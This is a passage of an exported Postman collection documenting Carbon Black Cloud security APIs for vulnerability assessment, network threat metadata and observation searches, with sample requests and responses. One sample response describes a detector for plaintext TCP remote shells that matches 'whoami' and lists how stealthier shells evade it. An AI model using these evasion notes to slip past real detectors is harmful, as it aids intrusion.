(CBC)","type":"folder"}},"urlObject":{"path":["vulnerability","assessment","api","v1","orgs","{{cb_org_key}}","vulnerabilities","{{cb_cve_id}}","actions"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"a7feb3a0-969b-4a0f-a595-7f75bf7386fc"}],"id":"d521bdbe-54ea-4ed9-9eaf-a25f0e97893e","_postman_id":"d521bdbe-54ea-4ed9-9eaf-a25f0e97893e","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}}],"id":"18e2a3c5-f270-4a4f-be3e-5540415a3261","description":"<h2 id=\"introduction\">Introduction</h2>\n<p>The Cloud Workload Vulnerability Assessment API allows users to view data center asset vulnerabilities, increase security visibility, and undertake prioritized proactive security patching on critical systems. The API provides a summary of vulnerability information filtered at the organization level, by device, or by vulnerability CVE ID. With a list of vulnerabilities prioritized by severity, exploitability, and current activity, users can apply proactive and impactful vulnerability patches.</p>\n<h3 id=\"use-cases\">Use Cases</h3>\n<ul>\n<li>Vulnerability information filtered by <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#organization-level\">organization</a>, <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#device-level\">device</a>, or <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#vulnerability-level\">vulnerability</a></li>\n<li>Summaries or Lists of vulnerabilities that can be prioritized by severity, exploitability, and current activity.</li>\n</ul>\n<h3 id=\"requirements\">Requirements</h3>\n<ul>\n<li>Appliance and vSphere configured to communicate with the Carbon Black Cloud see <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/installation\">Installation Guide</a> for more information</li>\n<li>Carbon Black Cloud Workload - You must have purchased one of the Carbon Black Cloud Workload packages</li>\n<li>All API calls require an API key with appropriate permissions see <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vulnerability-assessment/#authentication\">Authentication</a></li>\n</ul>\n","_postman_id":"18e2a3c5-f270-4a4f-be3e-5540415a3261","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Network Threat Metadata Service API","item":[{"name":"Get metadata for a detector (rule)","id":"664f68dd-2214-412d-96e6-6081caf5cd9d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"X-Auth-Token","value":""},{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/threatmetadata/v1/orgs/{{cb_org_key}}/detectors/{{cb_detector_id}}","description":"<p>Get the metadata for a given detector (rule).</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.xdr.metadata</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/network-threat-metadata-api/#get-metadata-for-a-detector-rule\">See Documentation about the APIs</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threatmetadata","v1","orgs","{{cb_org_key}}","detectors","{{cb_detector_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"eee5c67c-be7e-4f65-b515-dedc05cee3eb","name":"Get metadata for a detector (rule)","originalRequest":{"method":"GET","header":[{"key":"X-Auth-Token","value":""},{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/threatmetadata/v1/orgs/{{cb_org_key}}/detectors/{{cb_detector_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 Mar 2023 17:19:51 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"746"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"detector_abstract\": \"A remote shell is a bidirectional communication channel that allows an attacker to send commands to a compromised host over the network. A remote shell is defined *direct* (or *bind*) if the attacker's host (client) initiates the connection towards the compromised host (server).\\n\\nThe detector matches on the string `whoami` sent by the attacker (client) in the first 30 bytes of a TCP packet's payload. To decrease the likelihood of false positives, an alert is generated only if no known application layer protocol is decoded.\",\n    \"detector_goal\": \"Detect the transfer of a whoami command over a TCP direct shell.\",\n    \"false_negatives\": \"The detector only matches on plaintext TCP direct shell. Stealthier shells could obfuscate or encrypt the commands.\\n\\nFurthermore, if `whoami` is sent deeper in the TCP payload than 30 bytes, the detector would not generate an alert.\",\n    \"false_positives\": \"While a remote shell is a plausible explanation for the string `whoami` sent over a TCP connection, other applications may have legitimate reasons for transferring content matching the detector (e.g., plaintext streaming of audit logs).\\n\\nThe captured traffic associated to the event should help investigate the context and purpose of the TCP connection.\",\n    \"threat_public_comment\": \"Once a host has been compromised, a remote shell could be used by the attacker to perform additional tasks (e.g., environment reconnaissance, lateral movements). An alert for this threat is generated by a plain TCP connection that may be used to transmit and execute cleartext commands through a remote shell on a compromised host.\"\n}"}],"_postman_id":"664f68dd-2214-412d-96e6-6081caf5cd9d"}],"id":"0a11479f-7796-45ea-b2d5-3a290da64c74","description":"<p>The Network Threat Metadata Service gathers information to enrich Alerts and Observations of types Intrusion Detection System (IDS) and Network Traffic Analysis (NTA).</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/network-threat-metadata-api/\">See documentation</a></p>\n","_postman_id":"0a11479f-7796-45ea-b2d5-3a290da64c74","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Observations API","item":[{"name":"Observations Search Job","item":[{"name":"Create Search Job","id":"74617a72-ab20-466f-a78b-46ff2fb0b745","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"device_name\": [\n            \"Win7x64\"\n        ]\n    },\n    \"query\": \"process_name:svchost.exe\",\n    \"fields\": [\n        \"*\",\n        \"process_start_time\"\n    ],\n    \"sort\": [\n        {\n            \"field\": \"device_timestamp\",\n            \"order\": \"asc\"\n        }\n    ],\n    \"rows\": 10000,\n    \"start\": 0,\n    \"time_range\": {\n        \"end\": \"2020-01-27T18:34:04Z\",\n        \"start\": \"2020-01-18T18:34:04Z\"\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/observations/search_jobs","description":"<p>Creates an observations search job. The results for the search job may be requested using the query ID returned. This route will not request facets.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ, CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"criteria\": \"\",\n    \"exclusions\": \"\",\n    \"fields\": [\"\", \"\"],\n    \"query\": \"\",\n    \"rows\": \"\",\n    \"sort\": [\n        {\n            \"field\": \"\",\n            \"order\": \"\"\n        },\n        {\n            \"field\": \"\",\n            \"order\": \"\"\n        }\n    ],\n    \"start\": \"\",\n    \"time_range\": {\n        \"end\": \"\",\n        \"start\": \"\",\n        \"window\": \"\"\n    }\n}API DocumentationInformation on Fields\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","observations","search_jobs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"edae24c9-98f7-48be-b342-288502c50ba1","name":"Create Search Job","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"device_name\": [\n            \"Win7x64\"\n        ]\n    },\n    \"query\": \"process_name:svchost.exe\",\n    \"fields\": [\n        \"*\",\n        \"process_start_time\"\n    ],\n    \"sort\": [\n        {\n            \"field\": \"device_timestamp\",\n            \"order\": \"asc\"\n        }\n    ],\n    \"rows\": 10000,\n    \"start\": 0,\n    \"time_range\": {\n        \"end\": \"2020-01-27T18:34:04Z\",\n        \"start\": \"2020-01-18T18:34:04Z\"\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/observations/search_jobs"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 Mar 2023 20:31:44 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"53"},{"key":"Connection","value":"keep-alive"}],"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": \"0c6cf646-d97b-4ea6-89c0-6f0286d64339-sqs\"\n}"}],"_postman_id":"74617a72-ab20-466f-a78b-46ff2fb0b745"},{"name":"Get Results","id":"359be94f-3066-462d-b6dd-ffee02ff367c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/observations/search_jobs/{{cb_job_id}}/results?start=&rows=","description":"<p>Retrieves the observations search results for a given job ID. Results will be sorted based on the sort parameter used when starting the search.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ, CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/observations-api/#get-results\">API Documentation</a></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Information on Fields</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","observations","search_jobs","{{cb_job_id}}","results"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Starting rows of events, used for pagination</p>\n","type":"text/plain"},"key":"start","value":""},{"description":{"content":"<p>Number of events to get, used for pagination</p>\n","type":"text/plain"},"key":"rows","value":""}],"variable":[]}},"response":[{"id":"0f76657c-ba9d-4518-9276-55c443a590b8","name":"Get Results","originalRequest":{"method":"GET","header":[],"url":{"raw":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/observations/search_jobs/{{cb_job_id}}/results?start&rows","host":["{{cb_url}}"],"path":["api","investigate","v2","orgs","{{cb_org_key}}","observations","search_jobs","{{cb_job_id}}","results"],"query":[{"key":"start","value":null,"description":"Starting rows of events, used for pagination"},{"key":"rows","value":null,"description":"Number of events to get, used for pagination"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 Mar 2023 20:33:49 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"122"},{"key":"Connection","value":"keep-alive"}],"cookie":[],"responseTime":null,"body":"{\n    \"approximate_unaggregated\": 1,\n    \"completed\": 4,\n    \"contacted\": 4,\n    \"num_aggregated\": 1,\n    \"num_available\": 1,\n    \"num_found\": 1,\n    \"results\": [\n        {\n            \"alert_category\": [\"OBSERVED\"],\n            \"alert_id\": [\"be6ff259-88e3-6286-789f-74defa192d2e\"],\n            \"backend_timestamp\": \"2023-02-08T03:22:59.196Z\",\n            \"device_group_id\": 0,\n            \"device_id\": 17482451,\n            \"device_name\": \"dev01-39x-1\",\n            \"device_policy_id\": 20792247,\n            \"device_timestamp\": \"2023-02-08T03:20:33.751Z\",\n            \"enriched\": true,\n            \"enriched_event_type\": [\"NETWORK\"],\n            \"event_description\": \"The script\",\n            \"event_id\": \"8fbccc2da75f11ed937ae3cb089984c6\",\n            \"event_network_inbound\": false,\n            \"event_network_local_ipv4\": \"10.203.105.21\",\n            \"event_network_location\": \"Santa Clara,CA,United States\",\n            \"event_network_protocol\": \"TCP\",\n            \"event_network_remote_ipv4\": \"23.44.229.234\",\n            \"event_network_remote_port\": 80,\n            \"event_type\": [\"netconn\"],\n            \"ingress_time\": 1675826462036,\n            \"legacy\": true,\n            \"observation_description\": \"The application firefox.exe invoked \",\n            \"observation_id\": \"8fbccc2da75f11ed937ae3cb089984c6:be6ff259-88e3-6286-789f-74defa192d2e\",\n            \"observation_type\": \"CB_ANALYTICS\",\n            \"org_id\": \"ABCD123456\",\n            \"parent_guid\": \"ABCD123456-010ac2d3-00001c68-00000000-1d93b6c4d1f20ad\",\n            \"parent_pid\": 7272,\n            \"process_guid\": \"ABCD123456-010ac2d3-00001cf8-00000000-1d93b6c4d2b16a4\",\n            \"process_hash\": [\"9df1ec5e25919660a1b0b85d3965d55797b9aac81e028008428106c4dcda7b29\"],\n            \"process_name\": \"c:\\\\programdata\\\\mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\\\updates\\\\308046b0af4a39cb\\\\backgroundupdate.moz_log\",\n            \"process_pid\": [7416],\n            \"process_username\": [\"DEV01-39X-1\\\\bit9qa\"]\n        }\n    ]\n}"}],"_postman_id":"359be94f-3066-462d-b6dd-ffee02ff367c"},{"name":"Get Grouped Results","id":"961d5d3b-1560-4b71-9bf3-28323b7526b4","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"fields\": [\n        \"device_name\"\n    ],\n    \"rows\": 50,\n    \"range\": {\n        \"duration\": \"10h\",\n        \"field\": \"device_timestamp\",\n        \"method\": \"interval\"\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/observations/search_jobs/{{cb_job_id}}/group_results","description":"<p>Retrieves the observations search group results for a given query ID. Results will be grouped based on the fields provided and/or by timestamp field duration.  </p>\n<p>There are 2 different methods of grouping available when timestamp field is specified:</p>\n<ul>\n<li>interval (default) groups the documents when the timestamp difference between two consecutive sorted documents is less than the duration requested.<br />  e.g. input {doc1 = 10:00:00, doc2 = 10:07:00, doc3 = 10:13:00, doc4 = 10:27:00, duration = 10m}, doc1, doc2 and doc3 will be grouped into one since the time difference between sorted consecutive documents is less than duration.</li>\n<li>bucket which groups the documents in buckets of duration length meaning the max time difference between the min and max within a group can be up to the duration.<br />  e.g. input {doc1 = 10:00:00, doc2 = 10:07:00, doc3 = 10:13:00, doc4 = 10:21:00, duration = 10m}, doc1 and doc2 will be grouped into first group since the time difference between them is less than duration, doc3 will not be added to the first group it exceeds max capacity of bucket.</li>\n</ul>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ, CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"fields\": [\"string\"],\n  \"max_events_per_group\": integer,\n  \"range\": {\n    \"duration\": \"string\",\n    \"field\": \"string\",\n    \"method\": \"string\"\n  },\n  \"rows\": integer,\n  \"start\": integer\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/observations-api/#get-grouped-results\">API Documentation</a></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Information on Fields</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","observations","search_jobs","{{cb_job_id}}","group_results"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"ce220c1a-0991-439b-a00b-7d6eba31a9b1","name":"Get Grouped Results","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"fields\": [\n        \"device_name\"\n    ],\n    \"rows\": 50,\n    \"range\": {\n        \"duration\": \"10h\",\n        \"field\": \"device_timestamp\",\n        \"method\": \"interval\"\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/observations/search_jobs/{{cb_job_id}}/group_results"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 Mar 2023 20:37:51 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"153"},{"key":"Connection","value":"keep-alive"}],"cookie":[],"responseTime":null,"body":"{\n  \"approximate_unaggregated\": 442,\n  \"completed\": 7,\n  \"contacted\": 7,\n  \"group_results\": [\n    {\n        \"group_end_timestamp\": \"2023-02-16T13:10:10.249Z\",\n        \"group_key\": \"device_name,device_timestamp:10h\",\n        \"group_start_timestamp\": \"2023-02-16T13:10:10.249Z\",\n        \"group_value\": \"device-name-1\",\n        \"results\": [\n            {\n                \"backend_timestamp\": \"2023-02-16T20:10:00.913Z\",\n                \"childproc_count\": 0,\n                \"crossproc_count\": 1,\n                \"device_group_id\": 0,\n                \"device_id\": 123456,\n                \"device_name\": \"device-name-1\",\n                \"device_policy_id\": 123456,\n                \"device_timestamp\": \"2023-02-16T13:10:10.249Z\",\n                \"filemod_count\": 0,\n                \"ingress_time\": 1676578177580,\n                \"modload_count\": 37,\n                \"netconn_count\": 58,\n                \"observation_description\": \"HTTP traffic from \",\n                \"observation_id\": \"9BC8401D-AE6F-11ED-A7AB-005056A5B601:9bc8401c-ae6f-11ed-a7ab-1234566\",\n                \"observation_type\": \"INTRUSION_DETECTION_SYSTEM\",\n                \"org_id\": \"VZMTP3M2P6\",\n                \"parent_guid\": \"VZMTP3M2P6-0243c0e7-000002b8-00000000-1d93a21111111\",\n                \"parent_pid\": 111,\n                \"process_guid\": \"VZMTP3M2P6-0243c0e7-000015b0-00000000-1111111\",\n                \"process_hash\": [\n                    \"f586835082f632dc8d9404d83bc16316\",\n                    \"643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6511111\"\n                ],\n                \"process_name\": \"c:\\\\windows\\\\system32\\\\svchost.exe\",\n                \"process_pid\": [\n                    5552\n                ],\n                \"process_username\": [\n                    \"NT AUTHORITY\\\\SYSTEM\"\n                ],\n                \"regmod_count\": 1,\n                \"scriptload_count\": 0\n            }\n        ],\n        \"total_events\": 1\n    }\n  ],\n  \"groups_num_available\": 0,\n  \"num_aggregated\": 0,\n  \"num_available\": 1,\n  \"num_found\": 1\n}"}],"_postman_id":"961d5d3b-1560-4b71-9bf3-28323b7526b4"}],"id":"b0d90a50-41c1-43d2-9a5e-cdf8942417c3","description":"<p>Search for Observations by creating a search job and then either getting the results, or getting the results grouped by specified fields.</p>\n","_postman_id":"b0d90a50-41c1-43d2-9a5e-cdf8942417c3","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Observation Detail Job","item":[{"name":"Create Detail Job","id":"d408aea5-c781-44c9-a6bb-2111e483189c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"process_hash\": \"038894832709076d63111e99466f73575fcf3ca\",\n  \"count_unique_devices\": true,\n  \"max_rows\": 3\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/observations/detail_jobs","description":"<p>Creates an Observations details job. The details will include information about the given event that’s not normally accessible during a search. The results for the search job may be requested using the job ID returned.<br /><em>Note: Either</em> <em><strong>observation_ids</strong></em> <em>or</em> <em><strong>alert_id</strong></em> <em>is required however only one can be specified.</em></p>\n<p><em>Note: Four new search payloads have been introduced: \"<strong><strong>process_hash</strong></strong>\", \"<strong><strong>device_id</strong></strong>\", \"<strong><strong>count_unique_devices</strong></strong>\", and \"<strong><strong>max_rows</strong></strong>.\" The various combinations of these payloads yield distinct search outcomes:</em></p>\n<ul>\n<li><p><strong>process_hash</strong></p>\n<ul>\n<li>Finds the oldest event with this process hash.</li>\n</ul>\n</li>\n<li><p><strong>process_hash</strong> + <strong>device_id</strong></p>\n<ul>\n<li>Finds the oldest event with this process hash on the given device_id.</li>\n</ul>\n</li>\n<li><p><strong>process_hash</strong> + <strong>count_unique_devices</strong></p>\n<ul>\n<li>Returns how many unique devices have executed this process hash. It is recommended to set max_rows to 10,000 to ensure valid results from the endpoint.</li>\n</ul>\n</li>\n<li><p><strong>max_rows</strong></p>\n<ul>\n<li>An optional parameter that can only be combined with process_hash. It filters the number of results the endpoint returns, with a maximum value of 10,000. Therefore, the following cases are valid:<ul>\n<li>process_hash + max_rows</li>\n<li>process_hash + count_unique_devices + max_rows (recommended to be 10,000)</li>\n<li>process_hash + device_id + max_rows - Returns the top max_rows events, sorted from the oldest to the newest.</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ, CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<p>Note: Either observation_ids or alert_id is required however only one can be specified.</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"alert_id\": \"&lt;string&gt;\",\n  \"observation_ids\": [\n    \"&lt;string&gt;\"\n  ],\n  \"process_hash\": \"&lt;string&gt;\",\n  \"device_id\": &lt;integer&gt;,\n  \"count_unique_devices\": &lt;boolean&gt;,\n  \"max_rows\": &lt;integer&gt;\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/observations-api/#create-detail-job\">API Documentation</a></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Information on Fields</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","observations","detail_jobs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"0a6da26a-9d86-489d-b122-81edcb7f33fc","name":"Create Detail Job","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"alert_id\": \"038894832709076d63111e99466f73575fcf3ca\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/observations/detail_jobs"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 Mar 2023 20:42:22 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"53"},{"key":"Connection","value":"keep-alive"}],"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": \"777bfeb0-9fa0-4087-a9ba-36381b46e095-sqs\"\n}"},{"id":"c5e46360-d495-479c-834b-0aaf0c5bc3ba","name":"Create Detail Job","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"process_hash\": \"038894832709076d63111e99466f73575fcf3ca\",\n  \"count_unique_devices\": true,\n  \"max_rows\": 3\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/observations/detail_jobs"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 17 Nov 2023 16:30:36 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"58"},{"key":"Connection","value":"keep-alive"},{"key":"Content-Encoding","value":"br"},{"key":"Vary","value":"Accept-Encoding"}],"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": \"c31126dd-74df-4233-aee8-8573664daa29-sqs\"\n}"}],"_postman_id":"d408aea5-c781-44c9-a6bb-2111e483189c"},{"name":"Get Results","id":"a9ec7020-ea4a-4b0a-ba0b-6610c8149b09","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/observations/detail_jobs/{{cb_job_id}}/results","description":"<p>Retrieves the observations detail results for a given job ID.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ, CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/observations-api/#get-results-1\">API Documentation</a></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Information on Fields</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","observations","detail_jobs","{{cb_job_id}}","results"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"6d6e2b5e-cf18-43e0-9a09-1559bfdec809","name":"Get Results","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/observations/detail_jobs/{{cb_job_id}}/results"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 Mar 2023 20:44:16 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"126"},{"key":"Connection","value":"keep-alive"}],"cookie":[],"responseTime":null,"body":"{\n        \"approximate_unaggregated\": 2,\n        \"completed\": 4,\n        \"contacted\": 4,\n        \"num_aggregated\": 1,\n        \"num_available\": 1,\n        \"num_found\": 1,\n        \"results\": [\n                {\n                        \"alert_category\": [\n                                \"OBSERVED\"\n                        ],\n                        \"alert_id\": [\n                                